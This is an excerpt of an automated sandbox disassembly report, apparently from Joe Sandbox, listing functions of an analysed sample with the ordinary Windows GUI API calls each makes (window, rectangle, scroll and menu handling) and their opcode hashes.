GetClientRect.USER32(?,?), ref: 004F8F15
GetClientRect.USER32(?,?), ref: 004F8F3D
SetRectEmpty.USER32(?), ref: 004F8FCC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$Client
String ID:
API String ID: 1457177775-0
Opcode ID: 37f7600e84d90a44faec86a9ec29b46421e1188a99973c643302e26b0fea1ad6
Instruction ID: 67a6453ab36685ec75cdcf9821150f59723e8759e0c1f5d852c39de5469b41e1
Opcode Fuzzy Hash: 37f7600e84d90a44faec86a9ec29b46421e1188a99973c643302e26b0fea1ad6
Instruction Fuzzy Hash: 07D1D531A0060A8FCF15CF68C5805BEB7B2BF59314F24856EEA15AF340DB79A941CB94

Function 0051F5DC Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0051F62A
InflateRect.USER32(?,00000000,00000000), ref: 0051F656
GetSystemMetrics.USER32(00000002), ref: 0051F6D3
_memset.LIBCMT ref: 0051F6F9

Part of subcall function 004ECDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004E8A00,?,004E8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 004ECE0F

Part of subcall function 004E6F29: GetScrollInfo.USER32(?,?,?), ref: 004E6F5D

Part of subcall function 004E6EE9: SetScrollInfo.USER32(?,?,?,?), ref: 004E6F1A

EnableScrollBar.USER32(?,00000002,00000000), ref: 0051F7DC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Scroll$InfoRect$ClientEnableInflateMetricsSystemWindow_memset
String ID:
API String ID: 4263531605-0
Opcode ID: c477bc988aa9d29464eedb4c2f7ad5f0adeae8ff43c3cec49e14a33a91935f7b
Instruction ID: 25edd2a4359bf99dc4bb65af8736e146901bec2fd5a5f639a8b841be43970200
Opcode Fuzzy Hash: c477bc988aa9d29464eedb4c2f7ad5f0adeae8ff43c3cec49e14a33a91935f7b
Instruction Fuzzy Hash: 54612971A01219EFEB10DFA9C984AEDBBB5FF44700F14047AE909EB296D7B45D41CB60

Function 005B150B Relevance: 7.7, APIs: 5, Instructions: 154COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005B1512
CreateCompatibleDC.GDI32(00000000), ref: 005B1560
GetBoundsRect.GDI32(?,005B1A89,00000000,00000000), ref: 005B1588
CreateSolidBrush.GDI32 ref: 005B15A2
FillRect.USER32(00000000,005B1A89,?), ref: 005B15BB

Part of subcall function 005B08C5: FrameRgn.GDI32(00000000,?,00000000,005B1A89,0000003C), ref: 005B08ED

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CreateRect$BoundsBrushCompatibleFillFrameH_prolog3_Solid
String ID:
API String ID: 2864772683-0
Opcode ID: 121e486b145b98efe3b96a16609e688ddb5a3de5a72a4b9948fc92460dd39fb3
Instruction ID: 7f1d8b6ddc1115e2019fb4d966c3b264be076840fa4d7e21d071e07de1b8a81f
Opcode Fuzzy Hash: 121e486b145b98efe3b96a16609e688ddb5a3de5a72a4b9948fc92460dd39fb3
Instruction Fuzzy Hash: AE518271C10619EFCF11EF94C895AEDBBB5FF08700F18002AF801AA181C7756A85CFA5

Function 005232D4 Relevance: 7.7, APIs: 5, Instructions: 153windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005232DB
RedrawWindow.USER32(?,?,?,00000541), ref: 005234A1

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

GetSystemMenu.USER32(?,00000000), ref: 00523315
IsMenu.USER32(?), ref: 00523334
IsMenu.USER32(?), ref: 00523342

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Window$H_prolog3LongRedrawSystem
String ID:
API String ID: 1445310841-0
Opcode ID: dd1849e9d91969dcbc722b4c37b83df1577b55fa4361afcdec3b6bc44708afb5
Instruction ID: 2e1df8c0c1672411939f4677d352070db563f86f25a683701e762a5dfd06ccfb
Opcode Fuzzy Hash: dd1849e9d91969dcbc722b4c37b83df1577b55fa4361afcdec3b6bc44708afb5
Instruction Fuzzy Hash: 6251BF31A002168BDF04EFB5D85ABAE7BB1BF55310F144569E915EB2D1DF38AE00CBA0

Function 00550E4D Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00550E7C
GetCursorPos.USER32(?), ref: 00550E96
ScreenToClient.USER32(?,?), ref: 00550EA6
GetClientRect.USER32(?,?), ref: 00550ED1

Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E016D
Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E017A

SetRect.USER32(?,?,?,?,?), ref: 00550F88

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Client$RectScreen$CursorWindow
String ID:
API String ID: 3730894386-0
Opcode ID: b85970f2e5ed998622fe3c193579bca08f29e9ea1de90c1f1932c85863c1b55e
Instruction ID: 55a5f0ddb8ceead862db6ad41fd02a150fb3b297147fc76f76642aa54a4625cf
Opcode Fuzzy Hash: b85970f2e5ed998622fe3c193579bca08f29e9ea1de90c1f1932c85863c1b55e
Instruction Fuzzy Hash: B351E7B1E00209EFCB14DFA9C9949EEFBB9FF88315F10451AE905A7251DB34A945CF60

Function 00511276 Relevance: 7.6, APIs: 5, Instructions: 129windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 005112B5
ShowWindow.USER32(00000000,00000004), ref: 005112E7
IsWindow.USER32(?), ref: 0051132C
IsWindowVisible.USER32(?), ref: 00511337
ShowWindow.USER32(?,00000000), ref: 00511372

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Show$Visible
String ID:
API String ID: 2757229004-0
Opcode ID: e20d742d9f9f19f4747a5e658b038a5c380ebdd120615be7076305d61b250d2c
Instruction ID: 8f74c96e61179c58ed2eaf2686888e681f74431b6d1bf1d1492beac89f3e6787
Opcode Fuzzy Hash: e20d742d9f9f19f4747a5e658b038a5c380ebdd120615be7076305d61b250d2c
Instruction Fuzzy Hash: 96411731600705ABEB109F61C844FFB3FA8BF44750F1544AAFA16DB685DB34E880C7A9

Function 0051EDDF Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0051EE10

Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E016D
Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E017A

PtInRect.USER32(?,?,?), ref: 0051EE2A
PtInRect.USER32(?,?,?), ref: 0051EE9D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientRect$Screen
String ID:
API String ID: 3187875807-0
Opcode ID: 50cbf08e8e77ee73e231714b73a8d4aed1c785dded9d79aed6df69cdd35ebcf7
Instruction ID: 35dbc17ab40eee68968918b58d96292c98a5904a5034e479575e8df547881315
Opcode Fuzzy Hash: 50cbf08e8e77ee73e231714b73a8d4aed1c785dded9d79aed6df69cdd35ebcf7
Instruction Fuzzy Hash: EB41EF71A0150AEFDF11DFA4C985AEEBFF9FF09300F104959E806EB240D671A985DB51

Function 0055F663 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

GetWindowRect.USER32(?,0051CC3A), ref: 0055F697
GetSystemMetrics.USER32(00000021), ref: 0055F6A5
GetSystemMetrics.USER32(00000020), ref: 0055F6AB
GetKeyState.USER32(00000002), ref: 0055F6CB
InflateRect.USER32(0051CC3A,00000000,00000000), ref: 0055F701

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsRectSystemWindow$InflateLongState
String ID:
API String ID: 2406722796-0
Opcode ID: 46665f2ac249bcc0d51cc8f1906dbc84f68db5e25624b4028e48db3e3fe21f01
Instruction ID: a90e89128fbdc3fc839967aba216ac4ca0c1146f73f1c20b99b785e531f4f8b2
Opcode Fuzzy Hash: 46665f2ac249bcc0d51cc8f1906dbc84f68db5e25624b4028e48db3e3fe21f01
Instruction Fuzzy Hash: E631B431A102199BCF10DFB8D899ABF7FB5FB49392F54482BD802E7150DB749948CB50

Function 0053C7C9 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

Part of subcall function 0053399B: SetRectEmpty.USER32(?), ref: 005339B6

IsRectEmpty.USER32(?), ref: 0053C7EE

Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139

GetWindowRect.USER32(?,?), ref: 0053C82F
UnionRect.USER32(?,?,?), ref: 0053C858
EqualRect.USER32(?,?), ref: 0053C866
OffsetRect.USER32(?,?,?), ref: 0053C882

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientEmptyScreen$EqualOffsetUnionWindow
String ID:
API String ID: 2676815302-0
Opcode ID: aa120013f7be0ac41011bb8c282d780950edcdb0be92cabf33942af82b96c0ae
Instruction ID: 5a34a1dddc513d5c04e5168af84ca94cf03ed730b0b3ac4bd3d69e582c97832d
Opcode Fuzzy Hash: aa120013f7be0ac41011bb8c282d780950edcdb0be92cabf33942af82b96c0ae
Instruction Fuzzy Hash: 8641A9B2A00209AF8B00DFE9D9849EEFBF9FF58300B50456AE505F3251DB75AA05CB60

Function 00536EB2 Relevance: 7.6, APIs: 5, Instructions: 102windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001014,?,00000000), ref: 00536F88
SendMessageW.USER32(?,00000114,?,00000000), ref: 00536F98
SetScrollPos.USER32(?,00000002,00000000,00000001), ref: 00536FB6
GetParent.USER32(?), ref: 00536FC6
SendMessageW.USER32(?,?,00000000,00000000), ref: 00536FDE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$ParentScroll
String ID:
API String ID: 375824706-0
Opcode ID: 374426945f4f59b796da7e4ebce692c3cb69ab31d4ec0e6e35760eb716d52d38
Instruction ID: 17d31346ebdb2a538de6d89b4b7e61a8d5bc339c83937d9787c8360968388adf
Opcode Fuzzy Hash: 374426945f4f59b796da7e4ebce692c3cb69ab31d4ec0e6e35760eb716d52d38
Instruction Fuzzy Hash: 9831F071200246BFDB209F25DC84FAA3FA6FB45305F10C52DF65A8B2A1CB71D894DB50

Function 004F92C2 Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004F92EB
ScreenToClient.USER32(?,?), ref: 004F931B
SetCursor.USER32 ref: 004F9364
ScreenToClient.USER32(?,?), ref: 004F9384
PtInRect.USER32(?,?,?), ref: 004F93AD

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientCursorScreen$Rect
String ID:
API String ID: 1082406499-0
Opcode ID: 7cd878dc6565fc5c2ec5d3f6c842f6a62f38f5a2efaad4541a0fbde3ca15b00b
Instruction ID: 5ac78a3fd72678b629b283d4ec52286a30288c1d60a2c71eeee4e4ecfcc60b11
Opcode Fuzzy Hash: 7cd878dc6565fc5c2ec5d3f6c842f6a62f38f5a2efaad4541a0fbde3ca15b00b
Instruction Fuzzy Hash: 41312C75A0060DDFCB10EFA5D884ABEBBF9FB49304B10442EEA16E2251DB39AD45CB54

Function 00500B14 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 00500B4D
InflateRect.USER32(?,000000FF,000000FF), ref: 00500B7C
InflateRect.USER32(?,?,?), ref: 00500BDE
InflateRect.USER32(?,00000001,00000001), ref: 00500BFA

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: InflateRect
String ID:
API String ID: 2073123975-0
Opcode ID: 7c19a90be7e750ccf6879dfbd5c240f3e96609e751a6bd49f40642a32ce6375b
Instruction ID: 70af7d7e2c6235a4a4c976069fdea0f857184eaae01f0bb2dd908c9f867777fb
Opcode Fuzzy Hash: 7c19a90be7e750ccf6879dfbd5c240f3e96609e751a6bd49f40642a32ce6375b
Instruction Fuzzy Hash: 9E316D7260021ABBDF01DF94DC89EFA3BADBB49724B140612F624D32D1DA74EA50CB60

Function 0051E0B7 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0051E10B

Part of subcall function 004ECC18: GetWindowLongW.USER32(?,000000EC), ref: 004ECC23

OffsetRect.USER32(?,?,00000000), ref: 0051E166
UnionRect.USER32(?,?,?), ref: 0051E184
EqualRect.USER32(?,?), ref: 0051E192
UpdateWindow.USER32(?), ref: 0051E1CE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$EqualLongOffsetUnionUpdate
String ID:
API String ID: 4261707372-0
Opcode ID: 7958f8cc9b66785cdf54dfbf083ba73cfb587d1306effb9d6516498a6ec50413
Instruction ID: 099b586e04269aab37c98417d20432c3f163c3dc92108cac6f6d2c06799654bf
Opcode Fuzzy Hash: 7958f8cc9b66785cdf54dfbf083ba73cfb587d1306effb9d6516498a6ec50413
Instruction Fuzzy Hash: E23128B1901209EFCB10DFA9C9859EEBBF9FB48314F104A2EE516E3250CB34AA45DB50

Function 004DE4FC Relevance: 7.6, APIs: 5, Instructions: 92windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004DE503
CreateRectRgnIndirect.GDI32(?), ref: 004DE525

Part of subcall function 004E0090: SelectClipRgn.GDI32(?,00000000), ref: 004E00B6
Part of subcall function 004E0090: SelectClipRgn.GDI32(?,?), ref: 004E00CC

GetParent.USER32(?), ref: 004DE545
MapWindowPoints.USER32(?,00000000,?,00000001), ref: 004DE59D
SendMessageW.USER32(?,00000014,?,00000000), ref: 004DE5CA

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClipSelect$CreateH_prolog3IndirectMessageParentPointsRectSendWindow
String ID:
API String ID: 3362736716-0
Opcode ID: 6972407cd59fe04b4612d32ecec1820f2b8ea57cba4529e1c8d3b521a9382c36
Instruction ID: f40a74c69b9c041acc512bdceeeaa58c1c75bd7a7cc48efea02d39b53f6cab59
Opcode Fuzzy Hash: 6972407cd59fe04b4612d32ecec1820f2b8ea57cba4529e1c8d3b521a9382c36
Instruction Fuzzy Hash: 32313C71A0021AAFCF14EFA5C854ABEBBB5FF48344F00452AF516AB350EB749E05DB94

Function 0050C566 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 0050C5B0
SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 0050C5CC
SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 0050C60F

Part of subcall function 0055C679: SendMessageW.USER32(?,00000433,00000000,?), ref: 0055C6AC

SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 0050C5FA
SetRectEmpty.USER32(?), ref: 0050C62F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$EmptyRect
String ID:
API String ID: 4004678023-0
Opcode ID: e6780f2eb97eb576f383071f694af687a8f48afea81646cb7dc8ad1c82560a3a
Instruction ID: 3fab06adf897f854ed4fa630e4653d22abb22394b0b0bcd83d4f0b14195af0de
Opcode Fuzzy Hash: e6780f2eb97eb576f383071f694af687a8f48afea81646cb7dc8ad1c82560a3a
Instruction Fuzzy Hash: AD3100B19002099FDB14DBA8CC81EBFBFF9FB49340F11066DE65597250DA71A9418B90

Function 005404E3 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0054050D
IsWindow.USER32(?), ref: 0054059A
InflateRect.USER32(?,?,?), ref: 005405BB
InvalidateRect.USER32(?,?,00000001), ref: 005405CD
UpdateWindow.USER32(?), ref: 005405D9

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
